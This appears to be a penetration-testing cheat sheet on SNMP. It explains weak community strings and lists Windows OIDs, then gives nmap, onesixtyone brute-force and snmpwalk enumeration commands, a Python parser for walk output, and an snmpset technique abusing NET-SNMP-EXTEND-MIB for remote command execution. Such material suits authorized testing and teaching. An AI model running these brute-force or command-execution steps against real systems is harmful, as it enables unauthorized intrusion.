SNMP

Simple Network Management Protocol (SNMP) is a widely used network monitoring and control protocol.

SNMP runs over UDP and is stateless. Moreover, SNMP versions 1, 2 and 2c have no traffic encryption, which allows attackers to intercept sensitive information.

In addition, the old SNMP versions have weak authentication: access is controlled by community strings, which are usually left at the defaults "public" (read) and "private" (write).

In order to retrieve information about the target, network administrators rely on Management Information Bases (MIBs), which define the structure of the data that can be queried via SNMP. The Object Identifier (OID) is the key component of a MIB, allowing precise identification of specific variables and objects on the device.

Windows System Overview and Key Components OIDs:

OID                        Description
1.3.6.1.2.1.25.1.6.0       System Processes
1.3.6.1.2.1.25.4.2.1.2     Running Programs
1.3.6.1.2.1.25.4.2.1.4     Processes Path
1.3.6.1.2.1.25.2.3.1.4     Storage Units
1.3.6.1.2.1.25.6.3.1.2     Software Name
1.3.6.1.4.1.77.1.2.25      User Accounts
1.3.6.1.2.1.6.13.1.3       TCP Local Ports

Enumerate exposed SNMP services (UDP 161/162 are the standard ports, 10161/10162 are the SNMP-over-TLS/DTLS ports):

sudo nmap -sU -p 161,162,10161,10162 <target>

Brute force the community string:

onesixtyone -c <wordlist> -i <targetlist>

Useful wordlist:

community string wordlist

Enumerating

Now, after we have found the SNMP community string, it is possible to enumerate sensitive information using snmpwalk (the second form walks only the subtree under the given OID, e.g. one of the OIDs from the table above):

snmpwalk -c <community_string> -v1 <target>
snmpwalk -c <community_string> -v1 <target> <OID>

-v: defines the SNMP version.

-c: defines the community string.
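A walk of a whole device returns thousands of lines, so it helps to filter them down to the OIDs from the table above and to join related columns. The parser below is an added example (not part of the original page): it reads snmpwalk output in numeric-OID form (as printed with snmpwalk's -On option, or with no MIBs loaded), maps each line to the table's descriptions by longest OID prefix, and joins hrSWRunName (1.3.6.1.2.1.25.4.2.1.2) with hrSWRunPath (1.3.6.1.2.1.25.4.2.1.4) on the shared process index. The sample walk output is constructed, not captured from a real host.

```python
import re
from collections import defaultdict

# OID prefixes from the table above, mapped to the page's descriptions.
OID_TABLE = {
    "1.3.6.1.2.1.25.1.6.0": "System Processes",
    "1.3.6.1.2.1.25.4.2.1.2": "Running Programs",
    "1.3.6.1.2.1.25.4.2.1.4": "Processes Path",
    "1.3.6.1.2.1.25.2.3.1.4": "Storage Units",
    "1.3.6.1.2.1.25.6.3.1.2": "Software Name",
    "1.3.6.1.4.1.77.1.2.25": "User Accounts",
    "1.3.6.1.2.1.6.13.1.3": "TCP Local Ports",
}

# Constructed sample in snmpwalk's numeric output form (snmpwalk -On ...).
SAMPLE_WALK = r"""
.1.3.6.1.2.1.25.1.6.0 = Gauge32: 2
.1.3.6.1.2.1.25.4.2.1.2.1 = STRING: "System Idle Process"
.1.3.6.1.2.1.25.4.2.1.2.4 = STRING: "svchost.exe"
.1.3.6.1.2.1.25.4.2.1.4.1 = STRING: ""
.1.3.6.1.2.1.25.4.2.1.4.4 = STRING: "C:\Windows\System32\"
.1.3.6.1.4.1.77.1.2.25.1.1.5.65.100.109.105.110 = STRING: "Admin"
.1.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.0 = INTEGER: 445
"""

# "<oid> = <TYPE>: <value>"; the TYPE part is absent for error replies.
LINE_RE = re.compile(r'^\.?(?P<oid>[\d.]+)\s*=\s*(?:(?P<type>[A-Za-z0-9-]+):\s*)?(?P<value>.*)$')

def parse_line(line):
    """Return (oid, type, value) for one snmpwalk line, or None if unparsable."""
    line = line.strip()
    if line.startswith("iso."):          # output without MIBs loaded
        line = "1." + line[4:]
    m = LINE_RE.match(line)
    if not m:
        return None
    value = m.group("value").strip()
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]              # strip STRING quoting
    return m.group("oid"), m.group("type"), value

def classify(oid):
    """Longest table prefix matching the OID -> (description, row index)."""
    hits = [p for p in OID_TABLE if oid == p or oid.startswith(p + ".")]
    if not hits:
        return None
    prefix = max(hits, key=len)
    return OID_TABLE[prefix], oid[len(prefix) + 1:]   # "" for a scalar

def parse_walk(text):
    """Group values as {description: {row index: value}}."""
    out = defaultdict(dict)
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed and (hit := classify(parsed[0])):
            out[hit[0]][hit[1]] = parsed[2]
    return dict(out)

def running_processes(parsed):
    """Join process name and path on the hrSWRunTable index -> {pid: (name, path)}."""
    paths = parsed.get("Processes Path", {})
    return {int(i): (n, paths.get(i, "")) for i, n in parsed.get("Running Programs", {}).items()}
```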

SNMP Extended

Get the extended attributes (replace X with the SNMP version in use):

snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull

SNMP RCE

Using a private community string with write permissions, it is possible to exploit the extended object table (NET-SNMP-EXTEND-MIB) and run arbitrary commands on the target machine:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c <private_community_string> <target> \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

The repository below leverages this to obtain a reverse shell using a Python script.
